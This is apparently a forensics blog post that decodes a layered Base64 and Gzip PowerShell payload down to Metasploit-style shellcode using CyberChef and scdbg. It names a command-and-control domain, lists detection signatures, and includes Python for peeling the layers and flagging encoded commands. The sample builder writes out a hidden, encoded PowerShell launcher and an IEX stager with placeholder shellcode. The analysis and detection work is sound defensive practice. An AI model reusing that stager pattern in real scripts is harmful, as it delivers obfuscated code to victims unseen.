Analysing Encoded Powershell and Shellcode

Chris Eastwood
Digital Forensics
5 min read · Apr 26, 2021


Base64 encoded PowerShell commands can often be a quick win for the identification of suspicious activity. Recently, I've come across some notable samples, which after a bit of digging, provide valuable insight into attacker activities and new IOCs.

This article looks at a Base64-encoded PowerShell payload that appears to carry Metasploit Framework shellcode; payloads from other frameworks such as Cobalt Strike or PowerShell Empire can be analysed in a similar way.

In most cases, we can use CyberChef to build a recipe that peels back the layers of the payload, and then a tool such as scdbg to understand the shellcode.

CyberChef recipe decoding shellcode and scdbg analysis (overlay)

The recipe for the analysis is at the end of the article.

Note, the samples are publicly available online. Other samples may require slightly modified analysis, but this process is generally applicable to the latest active samples.

Example Payload

Due to the size of the payload, a snippet is shown here.

At first glance, the payload gives little indication of what it does, but the obfuscation itself is a reason to treat it as suspicious.

Initial Decode

The first step is to extract the encoded blob so that we can process it further. This can be done with the Regular Expression module, matching runs of the characters a-z, A-Z, 0-9, + and / that are at least 30 characters long.

Ensure that the Output Format is ‘List matches’ so that the blob is extracted for further analysis.

Once we have the snippet, we can decode it using the From Base64 module.

Extracting first blob and decoding

Sometimes a ‘.’ appears between each character: the decoded command is UTF-16LE, so every other byte is a null. The Remove Null Bytes module strips these and cleans up the output.

Compression Decoding

Inspecting the output, we see another Base64-encoded blob in the middle. It is preceded by some commands and arguments, but the strong indicators of Base64-encoded PowerShell are still there. Repeating the same modules as before pulls this blob out again, but this time the output is illegible.

Identifying Gzip compressed base64 blob

Looking closer, we can see that the output is compressed with Gzip (highlighted in image), and will require decompression.

Often, any additional obfuscation is near the encoded block. Examples I’ve seen are XOR, inflation, or gzip.

Adding the modules for Regular Expression to extract the snippet, From Base64 to decode, and Gunzip to decompress, we find some more code.

This time, there is mild obfuscation from variable names that look randomly generated, as well as another Base64 string. Sometimes at this stage there is further obfuscation through additional characters or varying capitalisation.

There are also many references within this code that may indicate the attacker's activities.

Recipe extracting and decoding layers of base64

Shellcode Analysis

One final Regular Expression to extract the Base64, followed by just From Base64 (with no further operations this time), brings us to an output that is largely illegible, but a couple of things can be spotted if it is looked at closely.

Alternatively, include the Strings module to extract them.

Strings module output from shellcode

The most obvious thing we see from this is a domain, yabadaba111.hopto.org.

The next steps on this might be to investigate the domain, but we’ll continue with the analysis here.

Continuing on with the decoded characters, we can convert this To Hex.
From my experience so far, I look out for the hexadecimal pattern fc e8 82 00 00 00 ... to identify shellcode.

To finish converting this shellcode, remove the spaces between each pair of hex digits. This can be done easily with the Find / Replace module: search for ‘ ’ (a single space) and replace it with nothing.

We have now fully decoded each layer of the base64 encoded payload down to the shellcode.
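The layer-peeling described above (Regular Expression, From Base64, Remove Null Bytes, Gunzip, To Hex) can be scripted for bulk triage. The following is an added example and not the article's own code or recipe: it builds a constructed three-layer sample (not a real payload; the "shellcode" is the six stub bytes fc e8 82 00 00 00 followed by placeholder text) and peels it back to the shellcode bytes. The UTF-16LE heuristic in `looks_utf16le` and the longest-run-first ordering are this example's own assumptions.

```python
"""Peel layered Base64 / UTF-16LE / Gzip PowerShell encoding down to a shellcode blob.
Added example mirroring the CyberChef steps; not the article's own code."""
import base64
import gzip
import re
from typing import List, Optional

# The CyberChef Regular Expression step: runs of Base64-alphabet characters, 30+ long.
B64_RUN = re.compile(rb"[A-Za-z0-9+/=]{30,}")
GZIP_MAGIC = b"\x1f\x8b"
# The hex pattern the article watches for: fc e8 82 00 00 00
MSF_STUB = bytes.fromhex("fce882000000")


def looks_utf16le(data: bytes) -> bool:
    """True when the bytes read as ASCII text with a NUL after every character,
    which is how a decoded -EncodedCommand (UTF-16LE) appears ("p.o.w.e.r")."""
    if len(data) < 2:
        return False
    evens, odds = data[0::2], data[1::2]
    return all(9 <= b < 0x7F for b in evens) and odds.count(0) >= 0.8 * len(odds)


def decode_layer(run: bytes) -> Optional[bytes]:
    """From Base64, then Gunzip or Remove Null Bytes as the content dictates."""
    try:
        raw = base64.b64decode(run + b"=" * (-len(run) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if raw.startswith(GZIP_MAGIC):
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    elif looks_utf16le(raw):
        raw = raw.replace(b"\x00", b"")  # Remove Null Bytes
    return raw or None


def peel(data: bytes, max_layers: int = 10) -> List[bytes]:
    """Repeat extract/decode until nothing decodes further or the innermost layer
    starts with the Metasploit stub. Returns every layer, outermost first."""
    layers = [data]
    for _ in range(max_layers):
        current = layers[-1]
        if current.startswith(MSF_STUB):
            break
        # Longest candidate first: the payload blob dwarfs incidental matches.
        candidates = sorted(B64_RUN.findall(current), key=len, reverse=True)
        decoded = next((d for d in map(decode_layer, candidates) if d), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def is_msf_shellcode(blob: bytes) -> bool:
    return blob.startswith(MSF_STUB)


def to_hex(blob: bytes) -> str:
    """To Hex with the spaces already removed (the Find / Replace step)."""
    return blob.hex()


def build_sample() -> bytes:
    """Constructed sample, NOT a real payload: the same three layers the article
    peels, assembled in reverse. Only the six stub bytes are realistic."""
    fake_shellcode = MSF_STUB + b"<constructed placeholder, not real shellcode>"
    inner = (b'[Byte[]]$sc = [System.Convert]::FromBase64String("'
             + base64.b64encode(fake_shellcode) + b'")')
    middle_b64 = base64.b64encode(gzip.compress(inner))
    middle = (b"IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
              b"(New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + middle_b64
              + b"'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    outer = base64.b64encode(middle.decode().encode("utf-16-le"))
    return b"powershell.exe -nop -w hidden -enc " + outer


if __name__ == "__main__":
    layers = peel(build_sample())
    for i, layer in enumerate(layers):
        print(f"layer {i}: {layer[:60]!r}")
    print("MSF stub:", is_msf_shellcode(layers[-1]), to_hex(layers[-1])[:12])
```

Writing `layers[-1]` to a file gives the same artefact as the CyberChef save step, ready for scdbg. Note that nulls are only stripped when the layer looks like UTF-16LE text; stripping them blindly would destroy the `00 00 00` bytes in the stub itself.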

Decoding each layer of the base64 encoded payload down to the shellcode.

We can save this output to a file (using the save symbol) and run scdbg.exe on it to try to extract any extra information.

scdbg.exe on the shellcode file

The output clearly shows us a set of commands and addresses, directly related to network and internet connections.
There is more context around some of the strings previously identified, including a port for the domain.

Removing the layers of decoding and then understanding the shellcode exposes the malicious payload and provides insight into the attacker's activities.

Much of what scdbg.exe reports was already visible in the initial CyberChef analysis of the shellcode, once Strings had been run on it.

As an example of the value of scdbg.exe, following the same process on another sample payload shows that valuable information is sometimes only found within the processed shellcode.

scdbg on shellcode to identify malicious IP and Port

Signatures

  • Encoded PowerShell should be investigated first. Indicators might include:
    • Gzip is often used to obfuscate data:
      • Base64-encoded (and Gzip-compressed) commands starting with H4sIAh... often indicate a code block of the sort that needs further analysis.
    • A Base64-encoded byte array (Byte[]) starting with /OiCAAAAYIn... often indicates shellcode, particularly from MSF.
    • Shellcode converted to hex, with the hexadecimal pattern fc e8 82 00 00 00 ..., is again a strong indicator of Metasploit Framework shellcode.
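These indicators can be turned into a first-pass check over process-creation telemetry. The following is an added example, not the article's own code: it runs over four constructed command lines (not real telemetry), decodes the first layer of any `-e`/`-enc`/`-EncodedCommand` argument, and tags the H4sIA and /OiCAAAA prefixes from the list above; `hex_has_msf_stub` applies the hex signature to a To Hex style dump. The flag regex only covers the common prefixes of -EncodedCommand and is this example's own simplification.

```python
"""Tag encoded-PowerShell indicators in process command lines.
Added example; sample records below are constructed, not real logs."""
import base64
import gzip
import re
from typing import Dict, List

# -e / -ec / -en / -enc / -encodedcommand followed by a Base64 run of 30+ chars.
# PowerShell accepts any unambiguous prefix of -EncodedCommand; this covers the
# usual ones only (assumption of this example).
ENC_FLAG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{30,})", re.IGNORECASE)


def scan_line(line: str) -> List[str]:
    """Return indicator tags for one command line (empty list when none apply)."""
    tags: List[str] = []
    m = ENC_FLAG.search(line)
    if not m:
        return tags
    tags.append("encoded-command")
    blob = m.group(1)
    try:
        # -EncodedCommand carries Base64 of UTF-16LE text; pad in case '=' was cut.
        decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le", "replace")
    except ValueError:
        return tags + ["undecodable"]
    if "H4sIA" in decoded:       # Base64 of a Gzip header: a compressed next stage
        tags.append("gzip-base64")
    if "/OiCAAAA" in decoded:    # Base64 of fc e8 82 00 00 00: MSF-style byte array
        tags.append("msf-byte-array")
    return tags


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based line number -> tags, for lines that raised at least one tag."""
    result = {}
    for number, line in enumerate(lines, 1):
        tags = scan_line(line)
        if tags:
            result[number] = tags
    return result


def hex_has_msf_stub(hexdump: str) -> bool:
    """Apply the fc e8 82 00 00 00 signature to a hex dump, spaced or not."""
    return "fce882000000" in re.sub(r"[^0-9a-f]", "", hexdump.lower())


def _enc(cmd: str) -> str:
    """Encode a command the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed stages: a gzipped harmless command and a fake byte array whose
# only realistic bytes are the six-byte stub.
GZIP_STAGE = base64.b64encode(gzip.compress(b"Write-Host 'constructed stage'")).decode()
BYTE_ARRAY = base64.b64encode(bytes.fromhex("fce882000000") + b"<constructed, not shellcode>").decode()

SAMPLE_LOG = [  # constructed process-creation records, not real telemetry
    'pid=4312 cmd="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
    'pid=4418 cmd="powershell.exe -nop -w hidden -enc '
    + _enc(f"IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('{GZIP_STAGE}')))") + '"',
    'pid=4420 cmd="powershell -e '
    + _enc(f'[Byte[]]$sc=[Convert]::FromBase64String("{BYTE_ARRAY}")') + '"',
    'pid=4499 cmd="cmd.exe /c dir C:\\Users"',
]

if __name__ == "__main__":
    for number, tags in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(tags)}")
```

The benign `-ExecutionPolicy Bypass -File` line raises no tag because its argument is not a Base64 run, which keeps the check focused on encoded commands rather than on PowerShell use in general.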

Incident Response, Forensic Investigations, and Threat Hunting professional, writing things to learn them better.